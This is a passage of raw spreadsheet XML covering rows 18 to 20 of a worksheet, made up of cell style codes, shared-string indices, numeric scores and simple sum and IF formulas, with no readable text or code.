      <c r="KQ18" s="127"/>
      <c r="KR18" s="127"/>
      <c r="KS18" s="127"/>
      <c r="KT18" s="127"/>
      <c r="KU18" s="127"/>
      <c r="KV18" s="127"/>
      <c r="KW18" s="127"/>
      <c r="KX18" s="127"/>
      <c r="KY18" s="127"/>
      <c r="KZ18" s="127"/>
      <c r="LA18" s="127"/>
      <c r="LB18" s="127"/>
      <c r="LC18" s="127"/>
      <c r="LD18" s="127"/>
      <c r="LE18" s="127"/>
      <c r="LF18" s="127"/>
      <c r="LG18" s="127"/>
      <c r="LH18" s="127"/>
      <c r="LI18" s="127"/>
      <c r="LJ18" s="127"/>
      <c r="LK18" s="127"/>
      <c r="LL18" s="127"/>
      <c r="LM18" s="127"/>
      <c r="LN18" s="127"/>
      <c r="LO18" s="127"/>
      <c r="LP18" s="127"/>
      <c r="LQ18" s="127"/>
      <c r="LR18" s="127"/>
      <c r="LS18" s="127"/>
      <c r="LT18" s="127"/>
      <c r="LU18" s="127"/>
      <c r="LV18" s="127"/>
      <c r="LW18" s="127"/>
      <c r="LX18" s="127"/>
      <c r="LY18" s="127"/>
      <c r="LZ18" s="127"/>
      <c r="MA18" s="127"/>
      <c r="MB18" s="127"/>
      <c r="MC18" s="127"/>
      <c r="MD18" s="127"/>
      <c r="ME18" s="127"/>
      <c r="MF18" s="127"/>
      <c r="MG18" s="127"/>
      <c r="MH18" s="127"/>
      <c r="MI18" s="127"/>
      <c r="MJ18" s="127"/>
      <c r="MK18" s="127"/>
      <c r="ML18" s="127"/>
      <c r="MM18" s="127"/>
      <c r="MN18" s="127"/>
      <c r="MO18" s="127"/>
      <c r="MP18" s="127"/>
      <c r="MQ18" s="127"/>
      <c r="MR18" s="127"/>
      <c r="MS18" s="127"/>
      <c r="MT18" s="127"/>
      <c r="MU18" s="127"/>
      <c r="MV18" s="127"/>
      <c r="MW18" s="127"/>
      <c r="MX18" s="127"/>
      <c r="MY18" s="127"/>
      <c r="MZ18" s="127"/>
      <c r="NA18" s="127"/>
      <c r="NB18" s="127"/>
      <c r="NC18" s="127"/>
      <c r="ND18" s="127"/>
      <c r="NE18" s="127"/>
      <c r="NF18" s="127"/>
      <c r="NG18" s="127"/>
      <c r="NH18" s="127"/>
      <c r="NI18" s="127"/>
      <c r="NJ18" s="127"/>
      <c r="NK18" s="127"/>
      <c r="NL18" s="127"/>
      <c r="NM18" s="127"/>
      <c r="NN18" s="127"/>
      <c r="NO18" s="127"/>
      <c r="NP18" s="127"/>
      <c r="NQ18" s="127"/>
      <c r="NR18" s="127"/>
      <c r="NS18" s="127"/>
      <c r="NT18" s="127"/>
      <c r="NU18" s="127"/>
      <c r="NV18" s="127"/>
      <c r="NW18" s="127"/>
      <c r="NX18" s="127"/>
      <c r="NY18" s="127"/>
    </row>
    <row r="19" ht="177.0" customHeight="1">
      <c r="B19" s="89" t="s">
        <v>292</v>
      </c>
      <c r="C19" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D19" s="90" t="s">
        <v>293</v>
      </c>
      <c r="E19" s="90" t="s">
        <v>486</v>
      </c>
      <c r="F19" s="90" t="s">
        <v>487</v>
      </c>
      <c r="G19" s="90" t="s">
        <v>12</v>
      </c>
      <c r="H19" s="90" t="s">
        <v>12</v>
      </c>
      <c r="I19" s="92" t="s">
        <v>488</v>
      </c>
      <c r="J19" s="92" t="s">
        <v>489</v>
      </c>
      <c r="K19" s="92" t="s">
        <v>490</v>
      </c>
      <c r="L19" s="93" t="s">
        <v>375</v>
      </c>
      <c r="M19" s="93">
        <v>2.0</v>
      </c>
      <c r="N19" s="93">
        <v>1.0</v>
      </c>
      <c r="O19" s="93">
        <v>0.0</v>
      </c>
      <c r="P19" s="93">
        <v>5.0</v>
      </c>
      <c r="Q19" s="93">
        <f t="shared" ref="Q19:Q40" si="70">R19+S19</f>
        <v>5</v>
      </c>
      <c r="R19" s="93">
        <v>5.0</v>
      </c>
      <c r="S19" s="93">
        <v>0.0</v>
      </c>
      <c r="T19" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U19" s="95" t="s">
        <v>219</v>
      </c>
      <c r="V19" s="96" t="s">
        <v>491</v>
      </c>
      <c r="W19" s="96" t="s">
        <v>12</v>
      </c>
      <c r="X19" s="97" t="s">
        <v>492</v>
      </c>
      <c r="Y19" s="96" t="s">
        <v>493</v>
      </c>
      <c r="Z19" s="96" t="s">
        <v>494</v>
      </c>
      <c r="AA19" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB19" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC19" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD19" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE19" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF19" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AG19" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH19" s="99" t="s">
        <v>495</v>
      </c>
      <c r="AI19" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ19" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK19" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AL19" s="100">
        <v>0.0</v>
      </c>
      <c r="AM19" s="100">
        <v>0.0</v>
      </c>
      <c r="AN19" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO19" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AP19" s="100">
        <v>0.0</v>
      </c>
      <c r="AQ19" s="100">
        <v>0.0</v>
      </c>
      <c r="AR19" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS19" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT19" s="100" t="str">
        <f t="shared" ref="AT19:AT21" si="71">IF(AR19="-",AS19,AR19)</f>
        <v>-</v>
      </c>
      <c r="AU19" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV19" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW19" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX19" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY19" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ19" s="100">
        <v>0.0</v>
      </c>
      <c r="BA19" s="102">
        <v>2.0</v>
      </c>
      <c r="BB19" s="102">
        <v>0.0</v>
      </c>
      <c r="BC19" s="102">
        <v>0.0</v>
      </c>
      <c r="BD19" s="102">
        <v>0.0</v>
      </c>
      <c r="BE19" s="102">
        <v>0.0</v>
      </c>
      <c r="BF19" s="102">
        <v>0.0</v>
      </c>
      <c r="BG19" s="102">
        <v>0.0</v>
      </c>
      <c r="BH19" s="102">
        <v>0.0</v>
      </c>
      <c r="BI19" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ19" s="102">
        <v>0.0</v>
      </c>
      <c r="BK19" s="102">
        <v>0.0</v>
      </c>
      <c r="BL19" s="103">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BM19" s="103">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="BN19" s="103">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BO19" s="103">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="BP19" s="103">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="BQ19" s="103">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="BR19" s="103">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="BS19" s="103">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="BT19" s="103">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="BU19" s="103">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="BV19" s="103">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="BW19" s="104" t="s">
        <v>496</v>
      </c>
      <c r="BX19" s="104">
        <v>4.0</v>
      </c>
      <c r="BY19" s="104">
        <v>8.0</v>
      </c>
      <c r="BZ19" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA19" s="104" t="s">
        <v>496</v>
      </c>
      <c r="CB19" s="104">
        <v>4.0</v>
      </c>
      <c r="CC19" s="104">
        <v>8.0</v>
      </c>
      <c r="CD19" s="104" t="s">
        <v>497</v>
      </c>
      <c r="CE19" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF19" s="104" t="str">
        <f t="shared" si="67"/>
        <v>2034567, 2013028, 2016992</v>
      </c>
      <c r="CG19" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH19" s="104" t="s">
        <v>497</v>
      </c>
      <c r="CI19" s="104">
        <v>2043217.0</v>
      </c>
      <c r="CJ19" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK19" s="104">
        <v>1.0</v>
      </c>
      <c r="CL19" s="104">
        <v>5.0</v>
      </c>
      <c r="CM19" s="105">
        <v>2.0</v>
      </c>
      <c r="CN19" s="105">
        <v>2.0</v>
      </c>
      <c r="CO19" s="105">
        <v>6.0</v>
      </c>
      <c r="CP19" s="105">
        <v>0.0</v>
      </c>
      <c r="CQ19" s="105">
        <v>8.0</v>
      </c>
      <c r="CR19" s="105">
        <v>8.0</v>
      </c>
      <c r="CS19" s="105">
        <v>1.0</v>
      </c>
      <c r="CT19" s="105">
        <v>0.0</v>
      </c>
      <c r="CU19" s="105">
        <v>5.0</v>
      </c>
      <c r="CV19" s="105">
        <v>5.0</v>
      </c>
      <c r="CW19" s="105">
        <v>2.0</v>
      </c>
      <c r="CX19" s="105">
        <v>6.0</v>
      </c>
      <c r="CY19" s="105">
        <v>0.0</v>
      </c>
      <c r="CZ19" s="105">
        <v>8.0</v>
      </c>
      <c r="DA19" s="105">
        <v>8.0</v>
      </c>
      <c r="DB19" s="106">
        <f t="shared" si="15"/>
        <v>2</v>
      </c>
      <c r="DC19" s="106">
        <f t="shared" si="16"/>
        <v>2</v>
      </c>
      <c r="DD19" s="106">
        <f t="shared" si="17"/>
        <v>1</v>
      </c>
      <c r="DE19" s="106">
        <f t="shared" si="18"/>
        <v>1.2</v>
      </c>
      <c r="DF19" s="106">
        <f t="shared" si="19"/>
        <v>1.2</v>
      </c>
      <c r="DG19" s="106">
        <f t="shared" si="20"/>
        <v>1</v>
      </c>
      <c r="DH19" s="106">
        <f t="shared" si="21"/>
        <v>1.6</v>
      </c>
      <c r="DI19" s="106">
        <f t="shared" si="22"/>
        <v>1.6</v>
      </c>
      <c r="DJ19" s="106">
        <f t="shared" si="23"/>
        <v>1</v>
      </c>
      <c r="DK19" s="107">
        <f t="shared" si="24"/>
        <v>1</v>
      </c>
      <c r="DL19" s="106">
        <f t="shared" si="25"/>
        <v>1</v>
      </c>
      <c r="DM19" s="108" t="s">
        <v>498</v>
      </c>
      <c r="DN19" s="108">
        <v>5.0</v>
      </c>
      <c r="DO19" s="108">
        <v>10.0</v>
      </c>
      <c r="DP19" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ19" s="108" t="s">
        <v>498</v>
      </c>
      <c r="DR19" s="108">
        <v>5.0</v>
      </c>
      <c r="DS19" s="108">
        <v>10.0</v>
      </c>
      <c r="DT19" s="108" t="s">
        <v>499</v>
      </c>
      <c r="DU19" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV19" s="108" t="str">
        <f t="shared" si="68"/>
        <v>50447, 2034567, 2013028, 2016992</v>
      </c>
      <c r="DW19" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX19" s="108" t="s">
        <v>499</v>
      </c>
      <c r="DY19" s="108">
        <v>2043217.0</v>
      </c>
      <c r="DZ19" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA19" s="108">
        <v>1.0</v>
      </c>
      <c r="EB19" s="108">
        <v>5.0</v>
      </c>
      <c r="EC19" s="109">
        <v>2.0</v>
      </c>
      <c r="ED19" s="109">
        <v>2.0</v>
      </c>
      <c r="EE19" s="109">
        <v>8.0</v>
      </c>
      <c r="EF19" s="109">
        <v>4.0</v>
      </c>
      <c r="EG19" s="109">
        <v>8.0</v>
      </c>
      <c r="EH19" s="109">
        <v>12.0</v>
      </c>
      <c r="EI19" s="109">
        <v>1.0</v>
      </c>
      <c r="EJ19" s="109">
        <v>0.0</v>
      </c>
      <c r="EK19" s="109">
        <v>5.0</v>
      </c>
      <c r="EL19" s="109">
        <v>5.0</v>
      </c>
      <c r="EM19" s="109">
        <v>2.0</v>
      </c>
      <c r="EN19" s="109">
        <v>8.0</v>
      </c>
      <c r="EO19" s="109">
        <v>4.0</v>
      </c>
      <c r="EP19" s="109">
        <v>8.0</v>
      </c>
      <c r="EQ19" s="109">
        <v>12.0</v>
      </c>
      <c r="ER19" s="110">
        <f t="shared" si="27"/>
        <v>2</v>
      </c>
      <c r="ES19" s="110">
        <f t="shared" si="28"/>
        <v>2</v>
      </c>
      <c r="ET19" s="110">
        <f t="shared" si="29"/>
        <v>1</v>
      </c>
      <c r="EU19" s="110">
        <f t="shared" si="30"/>
        <v>1.6</v>
      </c>
      <c r="EV19" s="110">
        <f t="shared" si="31"/>
        <v>1.6</v>
      </c>
      <c r="EW19" s="110">
        <f t="shared" si="32"/>
        <v>1</v>
      </c>
      <c r="EX19" s="110">
        <f t="shared" si="33"/>
        <v>2.4</v>
      </c>
      <c r="EY19" s="110">
        <f t="shared" si="34"/>
        <v>2.4</v>
      </c>
      <c r="EZ19" s="110">
        <f t="shared" si="35"/>
        <v>1</v>
      </c>
      <c r="FA19" s="110">
        <f t="shared" si="36"/>
        <v>1</v>
      </c>
      <c r="FB19" s="110">
        <f t="shared" si="37"/>
        <v>1</v>
      </c>
      <c r="FC19" s="111" t="s">
        <v>500</v>
      </c>
      <c r="FD19" s="111">
        <v>9.0</v>
      </c>
      <c r="FE19" s="111">
        <v>21.0</v>
      </c>
      <c r="FF19" s="101" t="s">
        <v>229</v>
      </c>
      <c r="FG19" s="111" t="s">
        <v>501</v>
      </c>
      <c r="FH19" s="111">
        <v>7.0</v>
      </c>
      <c r="FI19" s="111">
        <v>19.0</v>
      </c>
      <c r="FJ19" s="111" t="s">
        <v>502</v>
      </c>
      <c r="FK19" s="111" t="s">
        <v>229</v>
      </c>
      <c r="FL19" s="111" t="str">
        <f t="shared" si="69"/>
        <v>2002752, 2002749, 2006409, 2034567, 2013028, 2016992, 2002824, 50447</v>
      </c>
      <c r="FM19" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN19" s="111" t="s">
        <v>502</v>
      </c>
      <c r="FO19" s="111">
        <v>2043217.0</v>
      </c>
      <c r="FP19" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ19" s="111">
        <v>1.0</v>
      </c>
      <c r="FR19" s="111">
        <v>5.0</v>
      </c>
      <c r="FS19" s="112">
        <v>2.0</v>
      </c>
      <c r="FT19" s="112">
        <v>2.0</v>
      </c>
      <c r="FU19" s="112">
        <v>15.0</v>
      </c>
      <c r="FV19" s="112">
        <v>4.0</v>
      </c>
      <c r="FW19" s="112">
        <v>19.0</v>
      </c>
      <c r="FX19" s="112">
        <v>23.0</v>
      </c>
      <c r="FY19" s="112">
        <v>1.0</v>
      </c>
      <c r="FZ19" s="112">
        <v>0.0</v>
      </c>
      <c r="GA19" s="112">
        <v>5.0</v>
      </c>
      <c r="GB19" s="112">
        <v>5.0</v>
      </c>
      <c r="GC19" s="112">
        <v>2.0</v>
      </c>
      <c r="GD19" s="112">
        <v>13.0</v>
      </c>
      <c r="GE19" s="112">
        <v>4.0</v>
      </c>
      <c r="GF19" s="112">
        <v>15.0</v>
      </c>
      <c r="GG19" s="112">
        <v>19.0</v>
      </c>
      <c r="GH19" s="113">
        <f t="shared" si="39"/>
        <v>2</v>
      </c>
      <c r="GI19" s="113">
        <f t="shared" si="40"/>
        <v>2</v>
      </c>
      <c r="GJ19" s="113">
        <f t="shared" si="41"/>
        <v>1</v>
      </c>
      <c r="GK19" s="113">
        <f t="shared" si="42"/>
        <v>3</v>
      </c>
      <c r="GL19" s="113">
        <f t="shared" si="43"/>
        <v>2.6</v>
      </c>
      <c r="GM19" s="113">
        <f t="shared" si="44"/>
        <v>1</v>
      </c>
      <c r="GN19" s="113">
        <f t="shared" si="45"/>
        <v>4.6</v>
      </c>
      <c r="GO19" s="113">
        <f t="shared" si="46"/>
        <v>3.8</v>
      </c>
      <c r="GP19" s="113">
        <f t="shared" si="47"/>
        <v>1</v>
      </c>
      <c r="GQ19" s="114">
        <f t="shared" si="48"/>
        <v>1</v>
      </c>
      <c r="GR19" s="113">
        <f t="shared" si="49"/>
        <v>1</v>
      </c>
      <c r="GS19" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT19" s="94"/>
      <c r="GU19" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GV19" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GW19" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GX19" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY19" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ19" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA19" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB19" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC19" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD19" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HE19" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HF19" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG19" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH19" s="116">
        <v>18123.0</v>
      </c>
      <c r="HI19" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ19" s="93" t="s">
        <v>503</v>
      </c>
      <c r="HK19" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL19" s="93">
        <v>1.0</v>
      </c>
      <c r="HM19" s="93">
        <f t="shared" si="52"/>
        <v>1</v>
      </c>
      <c r="HN19" s="93">
        <v>0.0</v>
      </c>
      <c r="HO19" s="93">
        <v>1.0</v>
      </c>
      <c r="HP19" s="93">
        <v>1.0</v>
      </c>
      <c r="HQ19" s="118">
        <f t="shared" si="53"/>
        <v>1</v>
      </c>
      <c r="HR19" s="118">
        <f t="shared" si="54"/>
        <v>1</v>
      </c>
      <c r="HS19" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT19" s="139" t="s">
        <v>504</v>
      </c>
      <c r="HU19" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV19" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HW19" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HX19" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HY19" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ19" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA19" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB19" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC19" s="120" t="str">
        <f t="shared" ref="IC19:IC22" si="72">HV19</f>
        <v>-</v>
      </c>
      <c r="ID19" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IE19" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF19" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IG19" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH19" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II19" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ19" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK19" s="99">
        <v>1.0</v>
      </c>
      <c r="IL19" s="99">
        <v>0.0</v>
      </c>
      <c r="IM19" s="121">
        <f t="shared" si="57"/>
        <v>0</v>
      </c>
      <c r="IN19" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO19" s="98">
        <v>0.0</v>
      </c>
      <c r="IP19" s="123">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="IQ19" s="118">
        <f t="shared" si="59"/>
        <v>0</v>
      </c>
      <c r="IR19" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS19" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT19" s="127"/>
      <c r="IU19" s="127"/>
      <c r="IV19" s="127"/>
      <c r="IW19" s="127"/>
      <c r="IX19" s="127"/>
      <c r="IY19" s="127"/>
      <c r="IZ19" s="127"/>
      <c r="JA19" s="127"/>
      <c r="JB19" s="127"/>
      <c r="JC19" s="127"/>
      <c r="JD19" s="127"/>
      <c r="JE19" s="127"/>
      <c r="JF19" s="127"/>
      <c r="JG19" s="127"/>
      <c r="JH19" s="127"/>
      <c r="JI19" s="127"/>
      <c r="JJ19" s="127"/>
      <c r="JK19" s="127"/>
      <c r="JL19" s="127"/>
      <c r="JM19" s="127"/>
      <c r="JN19" s="127"/>
      <c r="JO19" s="127"/>
      <c r="JP19" s="127"/>
      <c r="JQ19" s="127"/>
      <c r="JR19" s="127"/>
      <c r="JS19" s="127"/>
      <c r="JT19" s="127"/>
      <c r="JU19" s="127"/>
      <c r="JV19" s="127"/>
      <c r="JW19" s="127"/>
      <c r="JX19" s="127"/>
      <c r="JY19" s="127"/>
      <c r="JZ19" s="127"/>
      <c r="KA19" s="127"/>
      <c r="KB19" s="127"/>
      <c r="KC19" s="127"/>
      <c r="KD19" s="127"/>
      <c r="KE19" s="127"/>
      <c r="KF19" s="127"/>
      <c r="KG19" s="127"/>
      <c r="KH19" s="127"/>
      <c r="KI19" s="127"/>
      <c r="KJ19" s="127"/>
      <c r="KK19" s="127"/>
      <c r="KL19" s="127"/>
      <c r="KM19" s="127"/>
      <c r="KN19" s="127"/>
      <c r="KO19" s="127"/>
      <c r="KP19" s="127"/>
      <c r="KQ19" s="127"/>
      <c r="KR19" s="127"/>
      <c r="KS19" s="127"/>
      <c r="KT19" s="127"/>
      <c r="KU19" s="127"/>
      <c r="KV19" s="127"/>
      <c r="KW19" s="127"/>
      <c r="KX19" s="127"/>
      <c r="KY19" s="127"/>
      <c r="KZ19" s="127"/>
      <c r="LA19" s="127"/>
      <c r="LB19" s="127"/>
      <c r="LC19" s="127"/>
      <c r="LD19" s="127"/>
      <c r="LE19" s="127"/>
      <c r="LF19" s="127"/>
      <c r="LG19" s="127"/>
      <c r="LH19" s="127"/>
      <c r="LI19" s="127"/>
      <c r="LJ19" s="127"/>
      <c r="LK19" s="127"/>
      <c r="LL19" s="127"/>
      <c r="LM19" s="127"/>
      <c r="LN19" s="127"/>
      <c r="LO19" s="127"/>
      <c r="LP19" s="127"/>
      <c r="LQ19" s="127"/>
      <c r="LR19" s="127"/>
      <c r="LS19" s="127"/>
      <c r="LT19" s="127"/>
      <c r="LU19" s="127"/>
      <c r="LV19" s="127"/>
      <c r="LW19" s="127"/>
      <c r="LX19" s="127"/>
      <c r="LY19" s="127"/>
      <c r="LZ19" s="127"/>
      <c r="MA19" s="127"/>
      <c r="MB19" s="127"/>
      <c r="MC19" s="127"/>
      <c r="MD19" s="127"/>
      <c r="ME19" s="127"/>
      <c r="MF19" s="127"/>
      <c r="MG19" s="127"/>
      <c r="MH19" s="127"/>
      <c r="MI19" s="127"/>
      <c r="MJ19" s="127"/>
      <c r="MK19" s="127"/>
      <c r="ML19" s="127"/>
      <c r="MM19" s="127"/>
      <c r="MN19" s="127"/>
      <c r="MO19" s="127"/>
      <c r="MP19" s="127"/>
      <c r="MQ19" s="127"/>
      <c r="MR19" s="127"/>
      <c r="MS19" s="127"/>
      <c r="MT19" s="127"/>
      <c r="MU19" s="127"/>
      <c r="MV19" s="127"/>
      <c r="MW19" s="127"/>
      <c r="MX19" s="127"/>
      <c r="MY19" s="127"/>
      <c r="MZ19" s="127"/>
      <c r="NA19" s="127"/>
      <c r="NB19" s="127"/>
      <c r="NC19" s="127"/>
      <c r="ND19" s="127"/>
      <c r="NE19" s="127"/>
      <c r="NF19" s="127"/>
      <c r="NG19" s="127"/>
      <c r="NH19" s="127"/>
      <c r="NI19" s="127"/>
      <c r="NJ19" s="127"/>
      <c r="NK19" s="127"/>
      <c r="NL19" s="127"/>
      <c r="NM19" s="127"/>
      <c r="NN19" s="127"/>
      <c r="NO19" s="127"/>
      <c r="NP19" s="127"/>
      <c r="NQ19" s="127"/>
      <c r="NR19" s="127"/>
      <c r="NS19" s="127"/>
      <c r="NT19" s="127"/>
      <c r="NU19" s="127"/>
      <c r="NV19" s="127"/>
      <c r="NW19" s="127"/>
      <c r="NX19" s="127"/>
      <c r="NY19" s="127"/>
    </row>
    <row r="20" ht="153.75" customHeight="1">
      <c r="B20" s="89" t="s">
        <v>310</v>
      </c>
      <c r="C20" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D20" s="90" t="s">
        <v>311</v>
      </c>
      <c r="E20" s="90" t="s">
        <v>505</v>
      </c>
      <c r="F20" s="90" t="s">
        <v>506</v>
      </c>
      <c r="G20" s="90" t="s">
        <v>12</v>
      </c>
      <c r="H20" s="90" t="s">
        <v>12</v>
      </c>
      <c r="I20" s="92" t="s">
        <v>507</v>
      </c>
      <c r="J20" s="92" t="s">
        <v>508</v>
      </c>
      <c r="K20" s="92" t="s">
        <v>509</v>
      </c>
      <c r="L20" s="93" t="s">
        <v>12</v>
      </c>
      <c r="M20" s="93">
        <v>5.0</v>
      </c>
      <c r="N20" s="93">
        <v>1.0</v>
      </c>
      <c r="O20" s="93">
        <v>1.0</v>
      </c>
      <c r="P20" s="93">
        <v>1.0</v>
      </c>
      <c r="Q20" s="93">
        <f t="shared" si="70"/>
        <v>2</v>
      </c>
      <c r="R20" s="93">
        <v>1.0</v>
      </c>
      <c r="S20" s="93">
        <v>1.0</v>
      </c>
      <c r="T20" s="94" t="s">
        <v>510</v>
      </c>
      <c r="U20" s="95" t="s">
        <v>401</v>
      </c>
      <c r="V20" s="96" t="s">
        <v>511</v>
      </c>
      <c r="W20" s="96" t="s">
        <v>12</v>
      </c>
      <c r="X20" s="97" t="s">
        <v>512</v>
      </c>
      <c r="Y20" s="96" t="s">
        <v>513</v>
      </c>
      <c r="Z20" s="96" t="s">
        <v>512</v>
      </c>
      <c r="AA20" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB20" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC20" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD20" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE20" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF20" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG20" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH20" s="99" t="s">
        <v>514</v>
      </c>
      <c r="AI20" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ20" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK20" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AL20" s="100">
        <v>0.0</v>
      </c>
      <c r="AM20" s="100">
        <v>0.0</v>
      </c>
      <c r="AN20" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO20" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AP20" s="100">
        <v>0.0</v>
      </c>
      <c r="AQ20" s="100">
        <v>0.0</v>
      </c>
      <c r="AR20" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AS20" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT20" s="100" t="str">
        <f t="shared" si="71"/>
        <v>-</v>
      </c>
      <c r="AU20" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV20" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AW20" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX20" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY20" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ20" s="100">
        <v>0.0</v>
      </c>
      <c r="BA20" s="102">
        <v>4.0</v>
      </c>
      <c r="BB20" s="102">
        <v>0.0</v>
      </c>
      <c r="BC20" s="102">
        <v>0.0</v>
      </c>
      <c r="BD20" s="102">
        <v>0.0</v>
      </c>
      <c r="BE20" s="102">
        <v>0.0</v>
      </c>
      <c r="BF20" s="102">
        <v>0.0</v>
      </c>
      <c r="BG20" s="102">
        <v>0.0</v>
      </c>
      <c r="BH20" s="102">
        <v>0.0</v>
      </c>
      <c r="BI20" s="102">
        <v>0.0</v>
      </c>
      <c r="BJ20" s="102">
        <v>0.0</v>
      </c>
      <c r="BK20" s="102">
        <v>0.0</v>
      </c>
      <c r="BL20" s="103">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="BM20" s="103">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="BN20" s="103">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BO20" s="103">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="BP20" s="103">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="BQ20" s="103">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="BR20" s="103">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="BS20" s="103">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="BT20" s="103">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="BU20" s="103">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="BV20" s="103">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="BW20" s="104" t="s">
        <v>515</v>
      </c>
      <c r="BX20" s="104">
        <v>2.0</v>
      </c>
      <c r="BY20" s="104">
        <v>4.0</v>
      </c>
      <c r="BZ20" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA20" s="104" t="s">
        <v>515</v>
      </c>
      <c r="CB20" s="104">
        <v>2.0</v>
      </c>
      <c r="CC20" s="104">
        <v>4.0</v>
      </c>
